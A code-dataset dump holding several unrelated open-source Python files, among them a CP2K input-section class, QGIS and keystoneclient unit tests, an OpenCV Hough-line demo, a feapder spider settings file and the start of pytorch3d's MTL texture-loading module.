| column | type | range / notes |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–616 |
| content_id | string | length 40–40 |
| detected_licenses | sequence | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k–681M, nullable (⌀) |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable (⌀) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable (⌀) |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3–10.2M |
| extension | string | 188 classes |
| content | string | length 3–10.2M |
| authors | sequence | length 1–1 |
| author_id | string | length 1–132 |
ae5f6a56b1dd9225cfb080b788cdc31d7483c321 | f3bd271bf00325881fb5b2533b9ef7f7448a75ec | /xcp2k/classes/_mc1.py | fa05bea2ae6ea09939c9d07048036355cd040bf2 | [] | no_license | obaica/xcp2k | 7f99fc9d494859e16b9b0ea8e217b0493f4b2f59 | 6e15c2c95658f545102595dc1783f5e03a9e6916 | refs/heads/master | 2020-07-15T17:27:43.378835 | 2019-02-11T16:32:24 | 2019-02-11T16:32:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,305 | py | from xcp2k.inputsection import InputSection
from _avbmc1 import _avbmc1
from _move_probabilities1 import _move_probabilities1
from _move_updates1 import _move_updates1
from _max_displacements1 import _max_displacements1
class _mc1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Nstep = None
self.Iprint = None
self.Nmoves = None
self.Nswapmoves = None
self.Lbias = None
self.Lstop = None
self.Ldiscrete = None
self.Rclus = None
self.Restart = None
self.Nvirial = None
self.Ensemble = None
self.Restart_file_name = None
self.Moves_file_name = None
self.Molecules_file_name = None
self.Coordinate_file_name = None
self.Energy_file_name = None
self.Data_file_name = None
self.Cell_file_name = None
self.Max_disp_file_name = None
self.Box2_file_name = None
self.Pressure = None
self.Temperature = None
self.Virial_temps = None
self.Discrete_step = None
self.Eta = None
self.Randomtoskip = None
self.AVBMC = _avbmc1()
self.MOVE_PROBABILITIES = _move_probabilities1()
self.MOVE_UPDATES = _move_updates1()
self.MAX_DISPLACEMENTS = _max_displacements1()
self._name = "MC"
self._keywords = {'Lstop': 'LSTOP', 'Nswapmoves': 'NSWAPMOVES', 'Lbias': 'LBIAS', 'Box2_file_name': 'BOX2_FILE_NAME', 'Nvirial': 'NVIRIAL', 'Ensemble': 'ENSEMBLE', 'Temperature': 'TEMPERATURE', 'Data_file_name': 'DATA_FILE_NAME', 'Pressure': 'PRESSURE', 'Restart': 'RESTART', 'Cell_file_name': 'CELL_FILE_NAME', 'Moves_file_name': 'MOVES_FILE_NAME', 'Iprint': 'IPRINT', 'Rclus': 'RCLUS', 'Eta': 'ETA', 'Molecules_file_name': 'MOLECULES_FILE_NAME', 'Virial_temps': 'VIRIAL_TEMPS', 'Randomtoskip': 'RANDOMTOSKIP', 'Max_disp_file_name': 'MAX_DISP_FILE_NAME', 'Restart_file_name': 'RESTART_FILE_NAME', 'Coordinate_file_name': 'COORDINATE_FILE_NAME', 'Nmoves': 'NMOVES', 'Discrete_step': 'DISCRETE_STEP', 'Energy_file_name': 'ENERGY_FILE_NAME', 'Ldiscrete': 'LDISCRETE', 'Nstep': 'NSTEP'}
self._subsections = {'AVBMC': 'AVBMC', 'MOVE_UPDATES': 'MOVE_UPDATES', 'MAX_DISPLACEMENTS': 'MAX_DISPLACEMENTS', 'MOVE_PROBABILITIES': 'MOVE_PROBABILITIES'}
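# Illustrative usage sketch (an addition for clarity, not part of the
# generated file; it assumes the xcp2k input writer consumes these
# section objects):
#
#     mc = _mc1()
#     mc.Ensemble = 'TRADITIONAL'   # maps to the MC keyword ENSEMBLE
#     mc.Nstep = 1000               # maps to NSTEP
#     mc.Temperature = 300.0        # maps to TEMPERATURE
#
# Nested subsections such as mc.MOVE_PROBABILITIES are pre-instantiated
# in __init__ above and can be configured the same way.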
| [
"[email protected]"
] | |
57abb1d492da22ca8039ba1f34f17f15d3e3ae53 | de626f1892619968efbaa22ea26079ee2269e799 | /test/test_Master_dialog.py | 02100573c7b18bcfb48fb78df5fb2f3d2c296df2 | [] | no_license | gerardoros/CartograficoQgisPlugin | 7e8724cec0469d0494090b3557e9d4e967935121 | 844fa1052f435478e2e946099d7dbd6b1b97c311 | refs/heads/master | 2023-04-04T08:06:30.967894 | 2021-04-07T14:15:37 | 2021-04-07T14:15:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,479 | py | # coding=utf-8
"""Dialog test.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Master'
__date__ = '2018-04-27'
__copyright__ = 'Copyright 2018, Master'
import unittest
from PyQt5.QtWidgets import QDialogButtonBox, QDialog  # QDialog and QDialogButtonBox live in QtWidgets, not QtGui, in PyQt5
from Master_dialog import MasterDialog
from utilities import get_qgis_app
QGIS_APP = get_qgis_app()
class MasterDialogTest(unittest.TestCase):
"""Test dialog works."""
def setUp(self):
"""Runs before each test."""
self.dialog = MasterDialog(None)
def tearDown(self):
"""Runs after each test."""
self.dialog = None
def test_dialog_ok(self):
"""Test we can click OK."""
button = self.dialog.button_box.button(QDialogButtonBox.Ok)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Accepted)
def test_dialog_cancel(self):
"""Test we can click cancel."""
button = self.dialog.button_box.button(QDialogButtonBox.Cancel)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Rejected)
if __name__ == "__main__":
suite = unittest.makeSuite(MasterDialogTest)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
| [
"[email protected]"
] | |
a96cb429f9ca4140e68c19d023448121c5c2e1c3 | 3ac84fa46db498e914f6e1aaf2eff490a63807a1 | /devstack/python-keystoneclient/keystoneclient/tests/auth/test_identity_common.py | 4a0cf572983e9f76f36dece4f158b8966f464bf9 | [
"Apache-2.0",
"BSD-2-Clause"
] | permissive | onsoku/horizon_review | 3c5f1a8f863142f3f724f59771ad39604bca4c20 | 80cca0badc61b4754ef2c10f23a0ee48cd227445 | refs/heads/master | 2020-05-20T11:11:25.625186 | 2015-01-21T01:01:59 | 2015-01-21T01:01:59 | 29,002,325 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,422 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import datetime
import uuid
from oslo.utils import timeutils
import six
from keystoneclient import access
from keystoneclient.auth import base
from keystoneclient.auth.identity import v2
from keystoneclient.auth.identity import v3
from keystoneclient import fixture
from keystoneclient import session
from keystoneclient.tests import utils
@six.add_metaclass(abc.ABCMeta)
class CommonIdentityTests(object):
TEST_ROOT_URL = 'http://127.0.0.1:5000/'
TEST_ROOT_ADMIN_URL = 'http://127.0.0.1:35357/'
TEST_COMPUTE_PUBLIC = 'http://nova/novapi/public'
TEST_COMPUTE_INTERNAL = 'http://nova/novapi/internal'
TEST_COMPUTE_ADMIN = 'http://nova/novapi/admin'
TEST_PASS = uuid.uuid4().hex
def setUp(self):
super(CommonIdentityTests, self).setUp()
self.TEST_URL = '%s%s' % (self.TEST_ROOT_URL, self.version)
self.TEST_ADMIN_URL = '%s%s' % (self.TEST_ROOT_ADMIN_URL, self.version)
self.TEST_DISCOVERY = fixture.DiscoveryList(href=self.TEST_ROOT_URL)
self.stub_auth_data()
@abc.abstractmethod
def create_auth_plugin(self, **kwargs):
"""Create an auth plugin that makes sense for the auth data.
It doesn't really matter what auth mechanism is used but it should be
appropriate to the API version.
"""
@abc.abstractmethod
def get_auth_data(self, **kwargs):
"""Return fake authentication data.
This should register a valid token response and ensure that the compute
endpoints are set to TEST_COMPUTE_PUBLIC, _INTERNAL and _ADMIN.
"""
def stub_auth_data(self, **kwargs):
token = self.get_auth_data(**kwargs)
self.stub_auth(json=token)
@abc.abstractproperty
def version(self):
"""The API version being tested."""
def test_discovering(self):
self.stub_url('GET', [],
base_url=self.TEST_COMPUTE_ADMIN,
json=self.TEST_DISCOVERY)
body = 'SUCCESS'
        # stub '/path' on the discovered versioned endpoint (TEST_URL) with our sample body
self.stub_url('GET', ['path'], text=body)
a = self.create_auth_plugin()
s = session.Session(auth=a)
resp = s.get('/path', endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
new_body = 'SC SUCCESS'
# if we don't specify a version, we use the URL from the SC
self.stub_url('GET', ['path'],
base_url=self.TEST_COMPUTE_ADMIN,
text=new_body)
resp = s.get('/path', endpoint_filter={'service_type': 'compute',
'interface': 'admin'})
self.assertEqual(200, resp.status_code)
self.assertEqual(new_body, resp.text)
def test_discovery_uses_session_cache(self):
# register responses such that if the discovery URL is hit more than
# once then the response will be invalid and not point to COMPUTE_ADMIN
resps = [{'json': self.TEST_DISCOVERY}, {'status_code': 500}]
self.requests.register_uri('GET', self.TEST_COMPUTE_ADMIN, resps)
body = 'SUCCESS'
self.stub_url('GET', ['path'], text=body)
        # now, whichever of the two plugins is used, there should not be a
        # second request to the discovery url.
s = session.Session()
a = self.create_auth_plugin()
b = self.create_auth_plugin()
for auth in (a, b):
resp = s.get('/path',
auth=auth,
endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
def test_discovery_uses_plugin_cache(self):
# register responses such that if the discovery URL is hit more than
# once then the response will be invalid and not point to COMPUTE_ADMIN
resps = [{'json': self.TEST_DISCOVERY}, {'status_code': 500}]
self.requests.register_uri('GET', self.TEST_COMPUTE_ADMIN, resps)
body = 'SUCCESS'
self.stub_url('GET', ['path'], text=body)
        # now, whichever of the two sessions is used, there should not be a
        # second request to the discovery url.
sa = session.Session()
sb = session.Session()
auth = self.create_auth_plugin()
for sess in (sa, sb):
resp = sess.get('/path',
auth=auth,
endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
def test_discovering_with_no_data(self):
        # stub the discovery endpoint so it returns a 400, i.e. there is no
        # version data available there.
self.stub_url('GET', [],
base_url=self.TEST_COMPUTE_ADMIN,
status_code=400)
# so the url that will be used is the same TEST_COMPUTE_ADMIN
body = 'SUCCESS'
self.stub_url('GET', ['path'], base_url=self.TEST_COMPUTE_ADMIN,
text=body, status_code=200)
a = self.create_auth_plugin()
s = session.Session(auth=a)
resp = s.get('/path', endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
def test_asking_for_auth_endpoint_ignores_checks(self):
a = self.create_auth_plugin()
s = session.Session(auth=a)
auth_url = s.get_endpoint(service_type='compute',
interface=base.AUTH_INTERFACE)
self.assertEqual(self.TEST_URL, auth_url)
def _create_expired_auth_plugin(self, **kwargs):
expires = timeutils.utcnow() - datetime.timedelta(minutes=20)
expired_token = self.get_auth_data(expires=expires)
expired_auth_ref = access.AccessInfo.factory(body=expired_token)
body = 'SUCCESS'
self.stub_url('GET', ['path'],
base_url=self.TEST_COMPUTE_ADMIN, text=body)
a = self.create_auth_plugin(**kwargs)
a.auth_ref = expired_auth_ref
return a
def test_reauthenticate(self):
a = self._create_expired_auth_plugin()
expired_auth_ref = a.auth_ref
s = session.Session(auth=a)
self.assertIsNot(expired_auth_ref, a.get_access(s))
def test_no_reauthenticate(self):
a = self._create_expired_auth_plugin(reauthenticate=False)
expired_auth_ref = a.auth_ref
s = session.Session(auth=a)
self.assertIs(expired_auth_ref, a.get_access(s))
def test_invalidate(self):
a = self.create_auth_plugin()
s = session.Session(auth=a)
# trigger token fetching
s.get_token()
self.assertTrue(a.auth_ref)
self.assertTrue(a.invalidate())
self.assertIsNone(a.auth_ref)
self.assertFalse(a.invalidate())
class V3(CommonIdentityTests, utils.TestCase):
@property
def version(self):
return 'v3'
def get_auth_data(self, **kwargs):
token = fixture.V3Token(**kwargs)
region = 'RegionOne'
svc = token.add_service('identity')
svc.add_standard_endpoints(admin=self.TEST_ADMIN_URL, region=region)
svc = token.add_service('compute')
svc.add_standard_endpoints(admin=self.TEST_COMPUTE_ADMIN,
public=self.TEST_COMPUTE_PUBLIC,
internal=self.TEST_COMPUTE_INTERNAL,
region=region)
return token
def stub_auth(self, subject_token=None, **kwargs):
if not subject_token:
subject_token = self.TEST_TOKEN
kwargs.setdefault('headers', {})['X-Subject-Token'] = subject_token
self.stub_url('POST', ['auth', 'tokens'], **kwargs)
def create_auth_plugin(self, **kwargs):
kwargs.setdefault('auth_url', self.TEST_URL)
kwargs.setdefault('username', self.TEST_USER)
kwargs.setdefault('password', self.TEST_PASS)
return v3.Password(**kwargs)
class V2(CommonIdentityTests, utils.TestCase):
@property
def version(self):
return 'v2.0'
def create_auth_plugin(self, **kwargs):
kwargs.setdefault('auth_url', self.TEST_URL)
kwargs.setdefault('username', self.TEST_USER)
kwargs.setdefault('password', self.TEST_PASS)
return v2.Password(**kwargs)
def get_auth_data(self, **kwargs):
token = fixture.V2Token(**kwargs)
region = 'RegionOne'
svc = token.add_service('identity')
svc.add_endpoint(self.TEST_ADMIN_URL, region=region)
svc = token.add_service('compute')
svc.add_endpoint(public=self.TEST_COMPUTE_PUBLIC,
internal=self.TEST_COMPUTE_INTERNAL,
admin=self.TEST_COMPUTE_ADMIN,
region=region)
return token
def stub_auth(self, **kwargs):
self.stub_url('POST', ['tokens'], **kwargs)
class CatalogHackTests(utils.TestCase):
TEST_URL = 'http://keystone.server:5000/v2.0'
OTHER_URL = 'http://other.server:5000/path'
IDENTITY = 'identity'
BASE_URL = 'http://keystone.server:5000/'
V2_URL = BASE_URL + 'v2.0'
V3_URL = BASE_URL + 'v3'
def test_getting_endpoints(self):
disc = fixture.DiscoveryList(href=self.BASE_URL)
self.stub_url('GET',
['/'],
base_url=self.BASE_URL,
json=disc)
token = fixture.V2Token()
service = token.add_service(self.IDENTITY)
service.add_endpoint(public=self.V2_URL,
admin=self.V2_URL,
internal=self.V2_URL)
self.stub_url('POST',
['tokens'],
base_url=self.V2_URL,
json=token)
v2_auth = v2.Password(self.V2_URL,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex)
sess = session.Session(auth=v2_auth)
endpoint = sess.get_endpoint(service_type=self.IDENTITY,
interface='public',
version=(3, 0))
self.assertEqual(self.V3_URL, endpoint)
def test_returns_original_when_discover_fails(self):
token = fixture.V2Token()
service = token.add_service(self.IDENTITY)
service.add_endpoint(public=self.V2_URL,
admin=self.V2_URL,
internal=self.V2_URL)
self.stub_url('POST',
['tokens'],
base_url=self.V2_URL,
json=token)
self.stub_url('GET', [], base_url=self.BASE_URL, status_code=404)
v2_auth = v2.Password(self.V2_URL,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex)
sess = session.Session(auth=v2_auth)
endpoint = sess.get_endpoint(service_type=self.IDENTITY,
interface='public',
version=(3, 0))
self.assertEqual(self.V2_URL, endpoint)
| [
"[email protected]"
] | |
20753a5eec6cbef1d2f88ca4dca223a00463326f | ef9dfb78938ecf500f2378a84eca8051255a836c | /star-travel/venv/bin/pycodestyle | 93fb5f501bc9e2c6985163ea18cf05d0f8008eee | [] | no_license | lesage20/djangoinitiation | cd11ed6a1cb16356075f4af3be8a93db31ba8c9f | 818e3593d16c1fac5b2741605a4675d7833c18b2 | refs/heads/master | 2021-02-16T18:24:02.846455 | 2020-03-11T04:44:24 | 2020-03-11T04:44:24 | 245,033,422 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | #!/Users/nan/Desktop/star-travel/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(_main())
| [
"[email protected]"
] | ||
9eb258cdc6b65a9919a795440b6beb5e84713442 | bdd40ea113fdf2f04ef7d61a096a575322928d1d | /Rupesh/opencv/Opencv_Python/Probabilistic_hough_line_L4_6.py | dd657873e7607cacae08499456287fe764d0fb17 | [] | no_license | rupesh7399/rupesh | 3eebf924d33790c29636ad59433e10444b74bc2f | 9b746acf37ab357c147cdada1de5458c5fc64f53 | refs/heads/master | 2020-12-22T05:01:29.176696 | 2020-03-03T10:32:36 | 2020-03-03T10:32:36 | 202,111,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 666 | py | import cv2
import numpy as np
# Grayscale and Canny Edges extracted
image = cv2.imread('images/soduku.jpg')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 100, 170, apertureSize = 3)
# Again we use the same rho and theta accuracies
# However, we specify a minimum vote (points along a line) of 200,
# a minimum line length of 5 pixels, and a maximum gap between segments of 10 pixels
lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 200, minLineLength=5, maxLineGap=10)
print(lines.shape)
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(image, (x1, y1), (x2, y2),(0, 255, 0), 3)
cv2.imshow('Probabilistic Hough Lines', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
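# For comparison, a hedged sketch of the standard (non-probabilistic)
# transform, which returns (rho, theta) pairs rather than segment endpoints:
#
#     hough_lines = cv2.HoughLines(edges, 1, np.pi / 180, 200)
#     for rho, theta in hough_lines[:, 0]:
#         a, b = np.cos(theta), np.sin(theta)
#         x0, y0 = a * rho, b * rho
#         # extend the infinite line far enough to cross the image
#         pt1 = (int(x0 + 1000 * (-b)), int(y0 + 1000 * a))
#         pt2 = (int(x0 - 1000 * (-b)), int(y0 - 1000 * a))
#         cv2.line(image, pt1, pt2, (255, 0, 0), 2)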
| [
"[email protected]"
] | |
700d87cb74a2cd087f84aba3b9e72437ec8f0300 | 8dbb7d4a57a29550568ea9b005ade6542bb546fd | /baidu-spider/setting.py | 6b7cf57e85f3e0f1b010ad7af1e0b45f29d2f094 | [] | no_license | kalicc/feapder_project | 96e4b0d575d61967fff445d62267abe0d1b0d7af | 19820eb7da8f9cec32a11bdcfc47232917743896 | refs/heads/master | 2023-08-05T00:44:36.822548 | 2021-09-24T10:02:53 | 2021-09-24T10:02:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | # -*- coding: utf-8 -*-
"""Spider configuration file"""
# import os
# import sys
#
# MYSQL
MYSQL_IP = "localhost"
MYSQL_PORT = 3306
MYSQL_DB = "feapder"
MYSQL_USER_NAME = "feapder"
MYSQL_USER_PASS = "feapder123"
#
# # MONGODB
# MONGO_IP = os.getenv("MONGO_IP", "localhost")
# MONGO_PORT = int(os.getenv("MONGO_PORT", 27017))
# MONGO_DB = os.getenv("MONGO_DB")
# MONGO_USER_NAME = os.getenv("MONGO_USER_NAME")
# MONGO_USER_PASS = os.getenv("MONGO_USER_PASS")
#
# REDIS
# ip:port; multiple entries may be given as a list or comma-separated, e.g. ip1:port1,ip2:port2 or ["ip1:port1", "ip2:port2"]
REDISDB_IP_PORTS = "localhost:6379"
# REDISDB_USER_PASS = os.getenv("REDISDB_USER_PASS")
# # Databases 0 through 15 by default, 16 in total
# REDISDB_DB = int(os.getenv("REDISDB_DB", 0))
# # For Redis sentinel mode
# REDISDB_SERVICE_NAME = os.getenv("REDISDB_SERVICE_NAME")
#
# # Pipelines for writing items to storage; customizable, defaults to MysqlPipeline
# ITEM_PIPELINES = [
#     "feapder.pipelines.mysql_pipeline.MysqlPipeline",
#     # "feapder.pipelines.mongo_pipeline.MongoPipeline",
# ]
#
# # Spider settings
# # COLLECTOR
# COLLECTOR_SLEEP_TIME = 1 # Interval for moving tasks from the task queue to the in-memory queue
# COLLECTOR_TASK_COUNT = 10 # Number of tasks fetched each time
#
# # SPIDER
# SPIDER_THREAD_COUNT = 1 # Spider concurrency
# SPIDER_SLEEP_TIME = 0 # Download interval in seconds. Randomization is supported, e.g. SPIDER_SLEEP_TIME = [2, 5] gives a random interval between 2 and 5 seconds, inclusive
# SPIDER_TASK_COUNT = 1 # Number of tasks each parser takes from the in-memory queue
# SPIDER_MAX_RETRY_TIMES = 100 # Maximum number of retries per request
# AUTO_STOP_WHEN_SPIDER_DONE = True # Whether the spider stops automatically when done
#
# # Browser rendering
# WEBDRIVER = dict(
#     pool_size=1, # Number of browsers
#     load_images=True, # Whether to load images
#     user_agent=None, # A string, or a no-argument function returning the user agent
#     proxy=None, # xxx.xxx.xxx.xxx:xxxx, or a no-argument function returning a proxy address
#     headless=False, # Whether to run headless
#     driver_type="CHROME", # CHROME, PHANTOMJS or FIREFOX
#     timeout=30, # Request timeout
#     window_size=(1024, 800), # Window size
#     executable_path=None, # Browser executable path; the default path is used if None
#     render_time=0, # Render time, i.e. how long to wait after opening the page before grabbing the source
#     custom_argument=["--ignore-certificate-errors"], # Custom browser rendering arguments
# )
#
# # Re-crawl failed requests when the spider starts
# RETRY_FAILED_REQUESTS = False
# # Save failed requests
# SAVE_FAILED_REQUEST = True
# # Request loss protection (a request not finished within REQUEST_LOST_TIMEOUT is re-dispatched and redone)
# REQUEST_LOST_TIMEOUT = 600 # 10 minutes
# # Network request timeout
# REQUEST_TIMEOUT = 22 # Timeout waiting for the server to respond: a float, or a (connect timeout, read timeout) tuple
#
# # Download cache backed by Redis. Because of memory limits it is recommended only for development and debugging, so that every debug run does not need a network request
# RESPONSE_CACHED_ENABLE = False # Whether to enable the download cache; True is recommended for costly data or data whose requirements change often
# RESPONSE_CACHED_EXPIRE_TIME = 3600 # Cache lifetime in seconds
# RESPONSE_CACHED_USED = False # Whether to read from the cache; may be set to True when re-collecting data
#
# # Proxy settings
# PROXY_EXTRACT_API = None # Proxy extraction API; returned proxies are separated by \r\n
# PROXY_ENABLE = True
#
# # Random headers
# RANDOM_HEADERS = True
# # UserAgent type: supports 'chrome', 'opera', 'firefox', 'internetexplorer', 'safari'; a random type is used if unspecified
# USER_AGENT_TYPE = "chrome"
# # Default user agent; has no effect when RANDOM_HEADERS=True
# DEFAULT_USERAGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
# # Use a requests session
# USE_SESSION = False
#
# # Deduplication
# ITEM_FILTER_ENABLE = False # Item deduplication
# REQUEST_FILTER_ENABLE = False # Request deduplication
#
# # Alerts; DingTalk, WeChat Work and email are supported
# # DingTalk alerts
# DINGDING_WARNING_URL = "" # DingTalk bot API
# DINGDING_WARNING_PHONE = "" # Alert recipients; a list is supported, multiple may be given
# # Email alerts
# EMAIL_SENDER = "" # Sender
# EMAIL_PASSWORD = "" # Authorization code
# EMAIL_RECEIVER = "" # Recipients; a list is supported, multiple may be given
# EMAIL_SMTPSERVER = "smtp.163.com" # Mail server; defaults to 163 mail
# # WeChat Work alerts
# WECHAT_WARNING_URL = "" # WeChat Work bot API
# WECHAT_WARNING_PHONE = "" # Alert recipients, @-mentioned in the group; a list is supported, multiple may be given
# WECHAT_WARNING_ALL = False # Whether to notify everyone; defaults to False
# # Intervals
# WARNING_INTERVAL = 3600 # Interval between identical alerts, to avoid flooding; 0 disables deduplication
# WARNING_LEVEL = "DEBUG" # Alert level, DEBUG / ERROR
# WARNING_FAILED_COUNT = 1000 # Alert once the number of failed tasks exceeds WARNING_FAILED_COUNT
#
# LOG_NAME = os.path.basename(os.getcwd())
# LOG_PATH = "log/%s.log" % LOG_NAME # Log file path
# LOG_LEVEL = "DEBUG"
# LOG_COLOR = True # Whether log output is colored
# LOG_IS_WRITE_TO_CONSOLE = True # Whether to print to the console
# LOG_IS_WRITE_TO_FILE = False # Whether to write to a file
# LOG_MODE = "w" # File write mode
# LOG_MAX_BYTES = 10 * 1024 * 1024 # Maximum bytes per log file
# LOG_BACKUP_COUNT = 20 # Number of log files to keep
# LOG_ENCODING = "utf8" # Log file encoding
# OTHERS_LOG_LEVAL = "ERROR" # Log level for third-party libraries
#
# # Switch the working directory to the current project path
# project_path = os.path.abspath(os.path.dirname(__file__))
# os.chdir(project_path) # Change the working directory
# sys.path.insert(0, project_path)
# print('Current working directory: ' + os.getcwd())
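# Illustrative note (not part of this config): feapder spiders can override
# these module-level settings per spider via __custom_setting__, e.g.
#
#     import feapder
#
#     class MySpider(feapder.AirSpider):
#         __custom_setting__ = dict(SPIDER_THREAD_COUNT=4)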
| [
"[email protected]"
] | |
c624db327e351b58c163be9c5581a3b6da482442 | cc75f278846363dfa23d35e0a580cf2bfde700d1 | /pytorch3d/io/mtl_io.py | f194b976b437de447635a34d0df6897064ca736f | [
"BSD-3-Clause"
] | permissive | 2429581027/pytorch3d | 78a0da94484f09f778a867d897e38905f355b60f | 5d65a0cf8c9a1fb755fd09ce098bcedb0c670d80 | refs/heads/master | 2022-12-25T12:42:44.861890 | 2020-10-06T22:53:45 | 2020-10-06T22:55:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,197 | py | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
"""This module implements utility functions for loading .mtl files and textures."""
import os
import warnings
from typing import Dict, List, Optional, Tuple
import numpy as np
import torch
import torch.nn.functional as F
from pytorch3d.io.utils import _open_file, _read_image
def make_mesh_texture_atlas(
material_properties: Dict,
texture_images: Dict,
face_material_names,
faces_verts_uvs: torch.Tensor,
texture_size: int,
texture_wrap: Optional[str],
) -> torch.Tensor:
"""
Given properties for materials defined in the .mtl file, and the face texture uv
coordinates, construct an (F, R, R, 3) texture atlas where R is the texture_size
and F is the number of faces in the mesh.
Args:
material_properties: dict of properties for each material. If a material
            does not have any properties it will have an empty dict.
texture_images: dict of material names and texture images
face_material_names: numpy array of the material name corresponding to each
face. Faces which don't have an associated material will be an empty string.
For these faces, a uniform white texture is assigned.
faces_verts_uvs: LongTensor of shape (F, 3, 2) giving the uv coordinates for each
vertex in the face.
texture_size: the resolution of the per face texture map returned by this function.
Each face will have a texture map of shape (texture_size, texture_size, 3).
texture_wrap: string, one of ["repeat", "clamp", None]
If `texture_wrap="repeat"` for uv values outside the range [0, 1] the integer part
is ignored and a repeating pattern is formed.
If `texture_wrap="clamp"` the values are clamped to the range [0, 1].
If None, do nothing.
Returns:
atlas: FloatTensor of shape (F, texture_size, texture_size, 3) giving the per
face texture map.
"""
# Create an R x R texture map per face in the mesh
R = texture_size
F = faces_verts_uvs.shape[0]
# Initialize the per face texture map to a white color.
# TODO: allow customization of this base color?
# pyre-fixme[16]: `Tensor` has no attribute `new_ones`.
atlas = faces_verts_uvs.new_ones(size=(F, R, R, 3))
# Check for empty materials.
if not material_properties and not texture_images:
return atlas
if texture_wrap == "repeat":
# If texture uv coordinates are outside the range [0, 1] follow
# the convention GL_REPEAT in OpenGL i.e the integer part of the coordinate
# will be ignored and a repeating pattern is formed.
# Shapenet data uses this format see:
# https://shapenet.org/qaforum/index.php?qa=15&qa_1=why-is-the-texture-coordinate-in-the-obj-file-not-in-the-range # noqa: B950
# pyre-fixme[16]: `ByteTensor` has no attribute `any`.
if (faces_verts_uvs > 1).any() or (faces_verts_uvs < 0).any():
msg = "Texture UV coordinates outside the range [0, 1]. \
The integer part will be ignored to form a repeating pattern."
warnings.warn(msg)
# pyre-fixme[9]: faces_verts_uvs has type `Tensor`; used as `int`.
# pyre-fixme[58]: `%` is not supported for operand types `Tensor` and `int`.
faces_verts_uvs = faces_verts_uvs % 1
elif texture_wrap == "clamp":
# Clamp uv coordinates to the [0, 1] range.
faces_verts_uvs = faces_verts_uvs.clamp(0.0, 1.0)
# Iterate through the material properties - not
# all materials have texture images so this has to be
# done separately to the texture interpolation.
for material_name, props in material_properties.items():
# Bool to indicate which faces use this texture map.
faces_material_ind = torch.from_numpy(face_material_names == material_name).to(
faces_verts_uvs.device
)
if faces_material_ind.sum() > 0:
# For these faces, update the base color to the
# diffuse material color.
if "diffuse_color" not in props:
continue
atlas[faces_material_ind, ...] = props["diffuse_color"][None, :]
# Iterate through the materials used in this mesh. Update the
# texture atlas for the faces which use this material.
# Faces without texture are white.
for material_name, image in list(texture_images.items()):
# Only use the RGB colors
if image.shape[2] == 4:
image = image[:, :, :3]
# Reverse the image y direction
image = torch.flip(image, [0]).type_as(faces_verts_uvs)
# Bool to indicate which faces use this texture map.
faces_material_ind = torch.from_numpy(face_material_names == material_name).to(
faces_verts_uvs.device
)
# Find the subset of faces which use this texture with this texture image
uvs_subset = faces_verts_uvs[faces_material_ind, :, :]
# Update the texture atlas for the faces which use this texture.
# TODO: should the texture map values be multiplied
# by the diffuse material color (i.e. use *= as the atlas has
# been initialized to the diffuse color)?. This is
# not being done in SoftRas.
atlas[faces_material_ind, :, :] = make_material_atlas(image, uvs_subset, R)
return atlas
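# Illustrative note on texture_wrap (values here are hypothetical): with
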